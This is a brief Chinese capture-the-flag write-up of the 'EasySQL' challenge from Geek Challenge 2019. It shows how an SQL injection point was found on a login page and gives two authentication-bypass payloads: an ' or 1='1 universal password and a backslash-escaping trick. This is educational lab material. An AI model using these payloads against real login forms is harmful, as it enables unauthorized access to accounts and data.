[极客大挑战 2019]EasySQL

页面概况

一个登入界面，随便输入一串数字：

在这个页面可以看到存在一些URL参数，这里应该就是sql注入点了

传入单引号发现有报错，那肯定就是sql注入了，这边经过测试发现查询语句应该是

1	select flag from xxx where username=''and password=''

用一下万能密码就可以成功登入了，payload：

?username=admin' or 1='1&password=admin' or 1='1

转义单引号，在usernmae一栏输入\，然后就会形成：

1	username='and password=

这种情况，之后在password输入or 1='1

payload:?username=\&password=or 1='1

This post is written by Boogipop, licensed under CC BY-NC 4.0.